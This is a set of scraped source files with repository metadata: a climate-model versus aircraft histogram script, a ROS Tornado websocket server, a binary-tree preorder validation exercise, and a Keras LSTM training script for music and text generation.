print(f'Seu nome tem {len(nome) - espaco} letras.')
print(f'Seu primeiro nome tem {primeiro} letras.')
| [
"adan.nogueira@gmail.com"
] | adan.nogueira@gmail.com |
ee0bc5029cbb3d92a0311e726a37acbb4ac87617 | 6601acd5ba7aaaa11f8620df9509e951574373b4 | /aircraft_comparisons/make_1D_histograms.py | bbdbf982f6c812b8a0ea1ad7599d3578d647ec37 | [] | no_license | rachawker/Hawker_ACP_2021-UM_CASIM_paper | 852d07519e4c15791e38bdf8ba7ae4ee9ac3707c | ff3cdd0b1ff72b0fed477824679ab7da49976aa3 | refs/heads/main | 2023-04-07T20:23:16.738292 | 2021-04-22T13:07:22 | 2021-04-22T13:14:40 | 360,516,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,512 | py |
from __future__ import division
import matplotlib.gridspec as gridspec
import iris
#import iris.coord_categorisation
import iris.quickplot as qplt
import cartopy
import cartopy.feature as cfeat
import rachel_dict as ra
#import iris # library for atmos data
import cartopy.crs as ccrs
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import copy
import matplotlib.colors as cols
import matplotlib.cm as cmx
import matplotlib._cntr as cntr
from matplotlib.colors import BoundaryNorm
import netCDF4
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import os,sys
#scriptpath = "/nfs/a201/eereh/scripts/2D_maps_of_column_max_reflectivity/"
#sys.path.append(os.path.abspath(scriptpath))
import colormaps as cmaps
from matplotlib.patches import Polygon
from mpl_toolkits.basemap import Basemap
import sys
import UKCA_lib as ukl
import glob
import netCDF4 as nc
import scipy.ndimage
import rachel_lists as rl
air_up = ra.read_in_nc_variables(rl.air_updraft_file, rl.air_updraft_var)
air_TWC = ra.read_in_nc_variables(rl.air_TWC_file, rl.air_TWC_var)
air_CDNC = ra.read_in_nc_variables(rl.air_CDNC_file, rl.air_CDNC_var)
air_2ds = ra.read_in_nc_variables(rl.air_2ds_file,rl.air_2ds_var)
air_alt = ra.read_in_nc_variables(rl.air_alt_file,rl.air_alt_var)
air_iwc = ra.read_in_nc_variables(rl.air_iwc_file,rl.air_iwc_var)
air_lwc = ra.read_in_nc_variables(rl.air_lwc_file,rl.air_lwc_var)
air_temp = ra.read_in_nc_variables(rl.air_temp_file,rl.air_temp_var)
print len(air_up)
data_path = sys.argv[1]
model_path = data_path
TWC = ra.read_in_nc_variables(data_path+rl.TWC_3D_file,rl.TWC_3D_var)
TWC = TWC*1000
updrafts = ra.read_in_nc_variables(data_path+rl.UPDRAFT_3D_file,rl.UPDRAFT_3D_var)
print len(updrafts)
CDNC = ra.read_in_nc_variables(data_path+rl.CDNC_3D_file,rl.CDNC_3D_var)
CDNC = CDNC*1e-6
IWC = ra.read_in_nc_variables(data_path+rl.IWC_3D_file,rl.IWC_3D_var)
IWC=IWC*1000
LWC = ra.read_in_nc_variables(data_path+rl.LWC_3D_file,rl.LWC_3D_var)
LWC=LWC*1000
ALT = ra.read_in_nc_variables(data_path+rl.ALT_3D_file,rl.ALT_3D_var)
TEMP = ra.read_in_nc_variables(data_path+rl.TEMP_3D_file,rl.TEMP_3D_var)
ICE_NUMBER = ra.read_in_nc_variables(data_path+rl.ICE_NUMBER_3D_file,rl.ICE_NUMBER_3D_var)
ICE_NUMBER = ICE_NUMBER*1e-6
GRAUPEL_NUMBER = ra.read_in_nc_variables(data_path+rl.GRAUPEL_NUMBER_3D_file,rl.GRAUPEL_NUMBER_3D_var)
GRAUPEL_NUMBER = GRAUPEL_NUMBER*1e-6
SNOW_NUMBER = ra.read_in_nc_variables(data_path+rl.SNOW_NUMBER_3D_file,rl.SNOW_NUMBER_3D_var)
SNOW_NUMBER = SNOW_NUMBER*1e-6
TOTAL_ICE_NUMBER = ICE_NUMBER+GRAUPEL_NUMBER+SNOW_NUMBER
CDNC_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_DROPLET_NUMBER_2D_file, rl.CLOUD_BASE_DROPLET_NUMBER_var)
CDNC_cloud_base = CDNC_cloud_base*1e-6
updraft_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_UPDRAFT_2D_file, rl.CLOUD_BASE_UPDRAFT_var)
ra.plot_1d_histogram_aircraft_and_model(air_up,updrafts,'Updraft Speed (m/s)', 'Updrafts_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC,'CDNC (/cm^3)', 'CDNC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC_cloud_base,'CDNC at cloud base (/cm^3)', 'CDNC_at_cloud_base_1D_histogram_new_RC_data', model_path)
TWC[TWC>3]=0
TWC[TWC==0]=np.nan
TWC = TWC[~np.isnan(TWC)]
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data_3gperkg_limit', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_lwc,LWC,'LWC (g/kg)', 'LWC_CDP_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_iwc,IWC,'IWC (g/kg)', 'IWC_NEVZOROV_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'ICE_CRYSTAL_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'TOTAL_ICE_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER[ALT<8000],'Ice number / 2ds count (<8000m) (/cm^3)', 'TOTAL_ICE_NUMBER_model_under_8000m_1D_histogram_new_RC_data', model_path)
| [
"rhawker@sci2.jasmin.ac.uk"
] | rhawker@sci2.jasmin.ac.uk |
83c8ab86e6e3a8b6764880c6ff5d8c569fa8a7b8 | 2612f762ec75a0723a4d12ae1d63a30792e4c236 | /src/websocket_server/src/ws_ros.py~ | f804ffdceb5f6c972b0265f5cf2bc6bfa41642a3 | [] | no_license | aransena/catkin_ws | efdf1a52b7dbbefbfa9cb748630f7be1ffd7f628 | eae6b83c80803a718a8e41569d3b4e7c1c838926 | refs/heads/master | 2021-01-18T21:12:48.557260 | 2016-06-03T13:39:22 | 2016-06-03T13:39:22 | 52,208,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,602 | #!/usr/bin/env python
# sample code from http://iot-projects.com/index.php?id=websocket-a-simple-example
import rospy
from std_msgs.msg import String as ros_string
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import json
pub = rospy.Publisher('websocket_server_msgs', ros_string)
outfile = open('data.txt', 'w')
class WSHandler(tornado.websocket.WebSocketHandler):
def check_origin(self, origin):
return True
def open(self):
print 'user is connected.\n'
def on_message(self, message):
print message
if len(message) > 10:
msg = json.loads(message)
json.dump(msg, outfile)
#print 'received message: %s\n' % json.loads(message)
pub.publish(str(message))
if message == "USER":
print "Responding..."
self.write_message(message) # + ' OK')
def on_close(self):
print 'connection closed\n'
application = tornado.web.Application([(r'/ws', WSHandler), ])
if __name__ == "__main__":
try:
pub = rospy.Publisher('websocket_server_msgs', ros_string)
rospy.init_node('websocket_server', anonymous=True)
rospy.loginfo("websocket_server started")
http_server = tornado.httpserver.HTTPServer(application)
try:
print(2)
#http_server.close_all_connections()
print(3)
except:
pass
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()
except Exception,e:
print "Server Error ", e
pass
| [
"aransena@gmail.com"
] | aransena@gmail.com | |
31e398f160b1e7e9561e782bfa7d7d1eb3c10ec1 | dea48ecac82d241e7960f52794eb8a29e5d2e428 | /jianzhioffer/二叉树/字符串验证是否树的前序遍历.py | 0947369b674e63e6e19fb50a48bf9bcedce51ce0 | [] | no_license | yxx94/2020- | e2302bed32c5d7d1e8b559ef378fc60408687934 | e63431cfc3d8c8903bb383144dd0c5ed5d71aa5c | refs/heads/master | 2020-09-03T09:04:08.795099 | 2019-09-19T08:12:51 | 2019-09-19T08:12:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # coding=utf-8
# Verify whether a string is a valid preorder serialization of a binary tree
'''
// Traverse str[] once.
// Every token that is not "#" adds one leaf slot; every "#" token uses up one leaf slot.
Input: "9,3,4,#,#,1,#,#,2,#,6,#,#"
Output: true
'''
'''
class Solution(object):
def isValidSerialization(self, preorder):
        res = 1  # number of leaf nodes (available slots)
for val in preorder.split(','):
if not res:
return False
if val == "#":
res -= 1
else:
res += 1
return not res
s = Solution()
print(s.isValidSerialization('9,3,4,#,#,1,#,#,2,#,6,#,#'))
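# Additional checks (sketch; expected values follow from the slot-counting logic above):
print(s.isValidSerialization('1,#'))        # False: a leaf slot is left unused
print(s.isValidSerialization('9,#,#,1'))    # False: tokens remain after the slots run out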
| [
"jiachen0212@163.com"
] | jiachen0212@163.com |
35b597f1aba066dbf2b4c96670ca7a2b6fea0c31 | 6d06b9368850aa7df559146498f2376ca24a33df | /other_code/train2.py | ec8c79368c6584e5b699e7147cbba9dc75437dd4 | [] | no_license | manosplitsis/MusicRep | a515d501bd6fa7e53409b3c272b260d646f88c14 | 859df02a304caf2b35688a7c676108602623eb28 | refs/heads/master | 2022-12-25T10:10:04.941114 | 2020-10-03T00:03:49 | 2020-10-03T00:03:49 | 284,100,757 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,139 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 20 15:43:37 2020
@author: incog
"""
import tensorflow as tf
import tensorflow.keras.backend as K
import tensorflow.keras as keras
from tensorflow.keras.models import Sequential,Model,load_model
from tensorflow.keras.layers import Input, Dense, Dropout, LSTM, Activation, Bidirectional, Flatten, AdditiveAttention,TimeDistributed
from tensorflow.keras import utils
from tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, LambdaCallback
from tensorflow.keras.utils import Sequence
from tensorflow.keras.mixed_precision import experimental as mixed_precision
policy = mixed_precision.Policy('mixed_float16')
mixed_precision.set_policy(policy)
from music21 import *
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import os
import datetime
import pytz
from IPython.display import clear_output, Audio
from collections import Counter
import glob
import pickle
from util import midi_to_onehot_dict, midi_to_onehot, set_callbacks, keep_dataset_notes, preprocess, glue_notes, add_piece_start_stop,load_doc
from model import create_simple_network_func, build_model,build_model2
from extract_notes import get_notes_midi1,get_notes_midi2,get_notes_midi5,get_notes_event1
def get_samples(notes,seq_length=64):
samples=[]
try:
notes[0][0]==0
except IndexError:
notes=[notes]
for piece in notes:
piece_length=piece.shape[0]
x=[]
if piece_length<=seq_length:
print('smol')
continue
for i in range(0, piece_length - seq_length, 1):
sequence_in = piece[i:i + seq_length+1]
#sequence_out = piece[i + seq_length]
x.append(np.array(sequence_in,dtype='int16'))
samples.append(np.array(x))
return np.array(samples)
def get_fsamples(notes,seq_length=64):
samples=[]
try:
notes[0][0]==0
except IndexError:
notes=[notes]
for piece in notes:
piece_length=len(piece)
x=[]
if piece_length<=seq_length:
continue
for i in range(0, piece_length - seq_length, 1):
sequence_in = piece[i:i + seq_length+1]
#sequence_out = piece[i + seq_length]
samples.append(np.array(sequence_in,dtype='int16'))
print('nb sequences:', len(samples))
return np.array(samples)
def samples_to_batches(samples,batch_size):
batches=[]
batch=[]
count=0
for sample in samples:
batch.append(sample)
count+=1
if count>=batch_size:
count=0
batches.append(np.array(batch))
batch=[]
return np.array(batches)
def samples_to_batches2(samples,batch_size):
batches=[]
batch=[]
count=0
for index,sample in enumerate(samples):
batch.append(index)
count+=1
if count>=batch_size:
count=0
batches.append(np.array(batch))
batch=[]
return np.array(batches)
def get_samples_text(text,seq_length,step=1):
sentences = []
#next_chars = []
for i in range(0, len(text) - seq_length, step):
sentences.append(text[i: i + seq_length+1])
#next_chars.append(text[i + seq_length])
print('nb sequences:', len(sentences))
return sentences
def get_samples_text_tokens(text,seq_length,step=1):
sentences = []
#next_chars = []
for i in range(0, len(text) - seq_length, step):
sentences.append(text[i: i + seq_length+1])
#next_chars.append(text[i + seq_length])
print('nb sequences:', len(sentences))
return sentences
class Data_Gen_Midi(Sequence):
def __init__(self,notes, batch_size=64,seq_length=64, to_fit=True,shuffle=True, one_hot=True,dict=True,n_vocab=130):
#self.list_IDs = sorted(glob.glob(f"{batch_folder}/**/*.krn"))
self.samples=get_fsamples(notes,seq_length=seq_length)
#self.batches=samples_to_batches(self.samples,batch_size)
self.batch_size = batch_size
self.seq_length=seq_length
self.shuffle=shuffle
self.to_fit=to_fit
self.one_hot=one_hot
self.dict=dict
self.dictionary=keep_dataset_notes(notes)
self.n_vocab=n_vocab
def __len__(self):
# print(self.type + ' - len : ' + str(int(np.ceil(self.x.shape[0] / self.batch_size))))
return int(len(self.samples)/self.batch_size)
def __getitem__(self, idx):
batch=self.samples[self.batch_size*idx:self.batch_size*(idx+1)]
#batch=self.batches[idx]
batch_x_midi =np.array([batch[i][0:self.seq_length] for i in range(self.batch_size)])
batch_y_midi =np.array([batch[i][self.seq_length] for i in range(self.batch_size)])
if self.one_hot:
batch_x=[]
batch_y=[]
if self.dict:
for seq in batch_x_midi:
batch_x.append(midi_to_onehot_dict(seq,self.dictionary))
batch_y=midi_to_onehot_dict(batch_y_midi,self.dictionary)
else:
for seq in batch_x_midi:
batch_x.append(midi_to_onehot(seq,dim=self.n_vocab))
batch_y=midi_to_onehot(batch_y_midi,dim=self.n_vocab)
batch_x=np.asarray(batch_x)
else:
batch_x=batch_x_midi
batch_y=batch_y_midi
return batch_x, batch_y
def on_epoch_end(self):
if self.shuffle == True:
np.random.shuffle(self.samples)
#self.batches=samples_to_batches(self.samples,self.batch_size)
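# Usage sketch for the generator above (illustrative only; `notes` stands for the
# per-piece integer note sequences loaded elsewhere in this file):
# gen = Data_Gen_Midi(notes, batch_size=64, seq_length=64)
# x, y = gen[0]  # x: one-hot input windows, y: one-hot next-note targets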
class Data_Gen_Midi2(Sequence):
def __init__(self,notes, batch_size=64,seq_length=64, to_fit=True,shuffle=True, one_hot=True,dict=True,n_vocab=130):
#self.list_IDs = sorted(glob.glob(f"{batch_folder}/**/*.krn"))
self.samples=get_fsamples(notes,seq_length=seq_length)
#self.batches=samples_to_batches(self.samples,batch_size)
self.batch_size = batch_size
self.seq_length=seq_length
self.shuffle=shuffle
self.to_fit=to_fit
self.one_hot=one_hot
self.dict=dict
self.dictionary=keep_dataset_notes(notes)
self.n_vocab=n_vocab
def __len__(self):
# print(self.type + ' - len : ' + str(int(np.ceil(self.x.shape[0] / self.batch_size))))
return int(len(self.samples)/self.batch_size)
def __getitem__(self, idx):
batch=self.samples[self.batch_size*idx:self.batch_size*(idx+1)]
#batch=self.batches[idx]
batch_x_midi =np.array([batch[i][0:self.seq_length] for i in range(self.batch_size)])
batch_y_midi =np.array([batch[i][1:] for i in range(self.batch_size)])
if self.one_hot:
batch_x=[]
batch_y=[]
if self.dict:
for seq in batch_x_midi:
batch_x.append(midi_to_onehot_dict(seq,self.dictionary))
for seq in batch_y_midi:
batch_y.append(midi_to_onehot_dict(seq,self.dictionary))
else:
for seq in batch_x_midi:
batch_x.append(midi_to_onehot(seq,dim=self.n_vocab))
for seq in batch_y_midi:
batch_y.append(midi_to_onehot(seq,dim=self.n_vocab))
batch_x=np.asarray(batch_x)
batch_y=np.asarray(batch_y)
else:
batch_x=batch_x_midi
batch_y=batch_y_midi
return batch_x, batch_y
def on_epoch_end(self):
if self.shuffle == True:
np.random.shuffle(self.samples)
#self.batches=samples_to_batches(self.samples,self.batch_size)
class Data_Gen_Text(Sequence):
def __init__(self,text, batch_size=64,seq_length=64, to_fit=True,shuffle=True, one_hot=False,n_vocab=130,dictionary={}):
#self.list_IDs = sorted(glob.glob(f"{batch_folder}/**/*.krn"))
self.sentences=get_samples_text(text,seq_length)
print('nuber of sequences: ',len(self.sentences))
#self.batches=samples_to_batches2(self.sentences,batch_size)
self.batch_size = batch_size
self.seq_length=seq_length
self.shuffle=shuffle
chars = sorted(list(set(text)))
self.one_hot=one_hot
#self.dictionary=dict((c, i) for i, c in enumerate(chars))
self.dictionary=dictionary
self.n_vocab=n_vocab
def __len__(self):
# print(self.type + ' - len : ' + str(int(np.ceil(self.x.shape[0] / self.batch_size))))
return int(len(self.sentences)/self.batch_size)
def __getitem__(self, idx):
batch=self.sentences[self.batch_size*idx:self.batch_size*(idx+1)]
batch_x_text =[batch[i][0:self.seq_length] for i in range(self.batch_size)]
batch_y_text =[batch[i][1:] for i in range(self.batch_size)]
if self.one_hot:
batch_x=[]
batch_y=[]
for seq in batch_x_text:
batch_x.append(midi_to_onehot_dict(seq,self.dictionary))
for seq in batch_y_text:
batch_y.append(midi_to_onehot_dict(seq,self.dictionary))
batch_x=np.array(batch_x)
batch_y=np.array(batch_y)
else:
batch_x=[[self.dictionary[i] for i in batch_x_text[j]] for j in range(self.batch_size)]
batch_y=[[self.dictionary[i] for i in batch_y_text[j]] for j in range(self.batch_size)]
return np.array(batch_x),np.array( batch_y)
def on_epoch_end(self):
if self.shuffle == True:
np.random.shuffle(self.sentences)
#self.batches=samples_to_batches2(self.sentences,self.batch_size)
def get_notes(encoding,data_dir='data',file_extension='.krn',resolution=8,streams=False):
if not os.path.exists('notes'):
os.mkdir('notes')
path=data_dir+'/**/*'+file_extension
if encoding==1:
get_notes_midi1(path,resolution=resolution,streams=streams)
elif encoding==2:
get_notes_midi2(path,resolution=resolution,streams=streams)
elif encoding==3:
get_notes_midi5(path,resolution=resolution,streams=streams)
elif encoding==4:
get_notes_event1(path,resolution=resolution,streams=streams)
def pretrain(notes_path,batch_size=256,seq_length=64,desc='',val_split=0.1, all_notes=False):
notes=pd.read_pickle(notes_path)
if all_notes:
nnotes=add_piece_start_stop(notes)
notes=glue_notes(nnotes)
batch_folder=f'batches/sl{seq_length}_bs{batch_size}'+'_'+desc
try:
os.makedirs(batch_folder, exist_ok=True)
os.makedirs(batch_folder+'/train', exist_ok=True)
os.makedirs(batch_folder+'/validate', exist_ok=True)
except:
print('Batch folder already exists')
durations=np.empty(0)
for piece in notes:
durations=np.append(durations,piece.shape[0])
#notes=np.array(notes)
inds=durations.argsort()
durations=durations[inds]
notes_sorted=notes[inds]
notes=notes_sorted[durations>64]
np.random.shuffle(notes)
notes_train=notes[0:len(notes)-int(val_split*len(notes))]
notes_validate=notes[len(notes)-int(val_split*len(notes)):len(notes)]
preprocess(notes_train,batch_folder=batch_folder+'/train',sequence_length=seq_length,batch_size=batch_size)
preprocess(notes_validate,batch_folder=batch_folder+'/validate',sequence_length=seq_length,batch_size=batch_size)
return batch_folder
def train_with_loader(batch_folder='npz',load=False,model_path='',desc='',dict=True):
#date to be used for archiving model and training history
date=datetime.datetime.utcnow()
gdate=date.astimezone(pytz.timezone('Europe/Athens'))
fdate=gdate.strftime('%d-%m-%y %H:%M')
fday=gdate.strftime('%d-%m-%y')
ftime=gdate.strftime('%H_%M')
print( fday)
print(ftime)
#os.mkdir('/experiments/{fday}')
#os.mkdir('/experiments/{fday}/{ftime} - {desc}')
experiment_path='experiments/'+fday+'/'+ftime+' - '+desc
os.makedirs(experiment_path+'/models')
logdir=experiment_path+'/logs'
os.makedirs(experiment_path+'/models',exist_ok=True)
input_shape=np.load(f'{batch_folder}/train/input_shape.npy')
batch_size=input_shape[0]
n_vocab=130
train_loader=Data_Gen_Midi(batch_folder=batch_folder+'/train',batch_size=batch_size,shuffle=True,n_vocab=n_vocab,dict=dict)
val_loader=Data_Gen_Midi(batch_folder=batch_folder+'/validate',batch_size=batch_size,shuffle=True,n_vocab=n_vocab,dict=dict)
if dict:
tdict=train_loader.dictionary
vdict=val_loader.dictionary
tdict.update(vdict)
val_loader.dictionary=tdict
dictionary=tdict
n_vocab=len(dictionary)
input_shape[2]=n_vocab
with open(experiment_path+'/dictionary', 'wb') as filepath:
pickle.dump(dictionary, filepath)
if load:
model=load_model(model_path)
else:
model=create_simple_network_func(input_shape,n_vocab=n_vocab)
filepath = os.path.abspath(experiment_path+'/models/model-{epoch:03d}-{loss:.4f}-{val_loss:.4f}')
checkpoint = ModelCheckpoint(
filepath,
save_weights_only=False,
period=10, #Every 10 epochs
monitor='loss',
verbose=2,
save_best_only=False,
mode='min'
)
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1,
patience=5, min_lr=0.000001)
plot_losses=TrainingPlot()
callbacks_list = [checkpoint,plot_losses]
herstory=model.fit(train_loader,validation_data=val_loader,initial_epoch=0, epochs=200, callbacks=callbacks_list)
with open(experiment_path+'/history', 'wb') as filepath:
pickle.dump(herstory, filepath)
return herstory
def train_with_loader2(notes_path,batch_size,seq_length,load=False,all_notes=False,model_path='',desc='',dict=True,lstm_size=32,lstm_no=1,dropout=0.2,learning_rate=0.001):
#date to be used for archiving model and training history
date=datetime.datetime.utcnow()
gdate=date.astimezone(pytz.timezone('Europe/Athens'))
fdate=gdate.strftime('%d-%m-%y %H:%M')
fday=gdate.strftime('%d-%m-%y')
ftime=gdate.strftime('%H_%M')
print( fday)
print(ftime)
#os.mkdir('/experiments/{fday}')
#os.mkdir('/experiments/{fday}/{ftime} - {desc}')
notes_name=os.path.basename(notes_path)
notes=pd.read_pickle(notes_path)
notes=notes[0:int(len(notes)/10)]
notes=add_piece_start_stop(notes)
print('Notes read')
if all_notes:
notes=glue_notes(notes,add_marks=True)
print('Notes glued')
model_info=f'_model_n{lstm_no}_s{lstm_size}_d{dropout}_sl{seq_length}_bs{batch_size}'
experiment_path=os.path.join('experiments',fday,notes_name+model_info,'')
logdir=os.path.join(experiment_path,'logs','')
os.makedirs(experiment_path+'/models',exist_ok=True)
os.makedirs(experiment_path+'/logs',exist_ok=True)
input_shape=np.array([batch_size,seq_length,130])
n_vocab=130
val_split=0.1
notes_train=notes[0:len(notes)-int(val_split*len(notes))]
notes_validate=notes[len(notes)-int(val_split*len(notes)):len(notes)]
train_loader=Data_Gen_Midi2(notes_train,batch_size=batch_size,seq_length=seq_length,shuffle=True,n_vocab=n_vocab,dict=dict)
val_loader=Data_Gen_Midi2(notes_validate,batch_size=batch_size,seq_length=seq_length,shuffle=True,n_vocab=n_vocab,dict=dict)
if dict:
tdict=train_loader.dictionary
vdict=val_loader.dictionary
tdict.update(vdict)
val_loader.dictionary=tdict
dictionary=tdict
n_vocab=len(dictionary)
input_shape[2]=n_vocab
with open(experiment_path+'/dictionary', 'wb') as filepath:
pickle.dump(dictionary, filepath)
if load:
model=load_model(model_path)
else:
#model=create_simple_network_func(input_shape,n_vocab=n_vocab,lstm_size=lstm_size)
model=build_model2(input_shape[0], input_shape[1], n_vocab, lstm_no=lstm_no,lstm_size=lstm_size,dropout_rate=dropout)
optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate)
model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])
model.summary()
filepath = os.path.abspath(experiment_path+'/models/model-{epoch:03d}-{loss:.4f}-{val_loss:.4f}')
checkpoint = ModelCheckpoint(
filepath,
save_weights_only=False,
period=2, #Every 10 epochs
monitor='loss',
verbose=2,
save_best_only=False,
mode='min'
)
#define callbacks
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1,
patience=5, min_lr=0.000001)
#plot_losses=TrainingPlot()
csvlog=tf.keras.callbacks.CSVLogger(experiment_path+'/logs.csv', separator=",", append=False)
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir = logdir,
histogram_freq = 1)
callbacks_list = [checkpoint,csvlog,tensorboard_callback]
model.fit(train_loader,validation_data=val_loader,initial_epoch=0, epochs=200, callbacks=callbacks_list)
def train_stateful(notes_path,batch_size,seq_length,load=False,all_notes=False,model_path='',desc='',dict=True,lstm_size=32,lstm_no=1,dropout=0.2):
notes_name=os.path.basename(notes_path)
notes=pd.read_pickle(notes_path)
notes=glue_notes(notes,add_marks=True)
    dictionary=keep_dataset_notes(notes)
    n_vocab=len(dictionary)
    input_shape=np.array([batch_size,seq_length,n_vocab])
    # the original code referenced an undefined experiment_path here; an assumed default
    # location is used instead so the dictionary dump does not raise a NameError
    experiment_path=os.path.join('experiments','stateful_'+notes_name)
    os.makedirs(experiment_path,exist_ok=True)
    with open(experiment_path+'/dictionary', 'wb') as filepath:
        pickle.dump(dictionary, filepath)
    samples=get_fsamples(notes,seq_length=seq_length)
    network_input=np.reshape(samples,(len(samples),seq_length,n_vocab))
if load:
model=load_model(model_path)
else:
#model=create_simple_network_func(input_shape,n_vocab=n_vocab,lstm_size=lstm_size)
model=build_state_model(input_shape[0], input_shape[1], n_vocab, lstm_no=lstm_no,lstm_size=lstm_size,dropout_rate=dropout)
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001)
model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])
model.fit(network_input,initial_epoch=0, epochs=200)
def train_text(text_path,batch_size,seq_length,load=False,model_path='',lstm_no=1,lstm_size=32,dropout=0.2,epochs=200):
#date to be used for archiving model and training history
date=datetime.datetime.utcnow()
gdate=date.astimezone(pytz.timezone('Europe/Athens'))
fdate=gdate.strftime('%d-%m-%y %H:%M')
fday=gdate.strftime('%d-%m-%y')
ftime=gdate.strftime('%H_%M')
print( fday)
print(ftime)
model_info=f'_model_n{lstm_no}_s{lstm_size}_d{dropout}_sl{seq_length}_bs{batch_size}'
text_name=os.path.basename(text_path)
experiment_path=os.path.join('experiments',fday,text_name+model_info,'')
logdir=os.path.join(experiment_path,'logs','')
os.makedirs(experiment_path+'/models',exist_ok=True)
os.makedirs(experiment_path+'/logs',exist_ok=True)
text=load_doc(text_path)
text=text[0:int(len(text)/4)]
text=text.split()
val_split=0.3
text_train=text[0:len(text)-int(val_split*len(text))]
text_validate=text[len(text)-int(val_split*len(text)):len(text)]
chars = sorted(list(set(text)))
print('total chars:', len(chars))
n_vocab=len(chars)
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
# cut the text in semi-redundant sequences of seq_length characters
train_loader=Data_Gen_Text(text_train,batch_size=batch_size,seq_length=seq_length,n_vocab=n_vocab,dictionary=char_indices)
val_loader=Data_Gen_Text(text_validate,batch_size=batch_size,seq_length=seq_length,n_vocab=n_vocab,dictionary=char_indices)
tdict=train_loader.dictionary
vdict=val_loader.dictionary
tdict.update(vdict)
val_loader.dictionary=tdict
dictionary=tdict
n_vocab=len(dictionary)
with open(experiment_path+'/dictionary', 'wb') as filepath:
pickle.dump(dictionary, filepath)
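    # `sample` is called by on_epoch_end below but is never defined in this file; this is
    # the standard temperature-sampling helper from the Keras text-generation example,
    # added here as a sketch so the callback is self-contained.
    def sample(preds, temperature=1.0):
        preds = np.asarray(preds).astype('float64')
        preds = np.log(preds) / temperature
        exp_preds = np.exp(preds)
        preds = exp_preds / np.sum(exp_preds)
        probas = np.random.multinomial(1, preds, 1)
        return np.argmax(probas)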
def on_epoch_end(epoch, _):
# Function invoked at end of each epoch. Prints generated text.
print()
print('----- Generating text after Epoch: %d' % epoch)
start_index = random.randint(0, len(text) - seq_length - 1)
for diversity in [0.2, 0.5, 1.0, 1.2]:
print('----- diversity:', diversity)
generated = ''
sentence = text[start_index: start_index + seq_length]
generated += sentence
print('----- Generating with seed: "' + sentence + '"')
sys.stdout.write(generated)
for i in range(400):
x_pred = np.zeros((1, seq_length, len(chars)))
for t, char in enumerate(sentence):
x_pred[0, t, char_indices[char]] = 1.
preds = model.predict(x_pred, verbose=0)[0]
next_index = sample(preds, diversity)
next_char = indices_char[next_index]
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
print()
print_callback = LambdaCallback(on_epoch_end=on_epoch_end)
filepath = os.path.abspath(experiment_path+'/models/model-{epoch:03d}-{loss:.4f}-{val_loss:.4f}')
checkpoint = ModelCheckpoint(
filepath,
save_weights_only=False,
period=2, #Every 10 epochs
monitor='loss',
verbose=2,
save_best_only=False,
mode='min'
)
# learning rate scheduler
def schedule(epoch):
if epoch < 5:
new_lr = .003
elif epoch >= 5:
new_lr = 0.003 * (epoch-4) ** 0.97
print("\nLR at epoch {} = {} \n".format(epoch,new_lr))
return new_lr
lr_scheduler = tf.keras.callbacks.LearningRateScheduler(schedule)
csvlog=tf.keras.callbacks.CSVLogger(experiment_path+'/logs.csv', separator=",", append=False)
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir = logdir,
histogram_freq = 1,
profile_batch = '2,200')
callbacks_list=[checkpoint,tensorboard_callback,csvlog,lr_scheduler]
model=build_model2(batch_size, seq_length, n_vocab,lstm_size=lstm_size,lstm_no=lstm_no,dropout_rate=dropout)
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001)
model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])
model.summary()
model.fit(train_loader,validation_data=val_loader,initial_epoch=0, epochs=epochs,callbacks=callbacks_list)
#%%
if __name__=='__main__':
notes_path='notes/notes_tstep1_res8'
res=8
enc=1
batch_size=256
seq_length=64
train_with_loader2(notes_path, batch_size, seq_length,lstm_no=2,lstm_size=64,dropout=0.5,all_notes=False)
'''
if __name__=='__main__':
#get_kern_text('data1','kern_text.txt')
#removeComments('kern_text.txt', 'kern_text_nocomment.txt')
text_path='data_v3_startstop'
train_text(text_path,256,64,lstm_no=1,lstm_size=32,dropout=0.2,epochs=100)
#train_text(text_path,64,50,lstm_no=3,lstm_size=512,dropout=0.5,epochs=100)
''' | [
"38662795+manosplitsis@users.noreply.github.com"
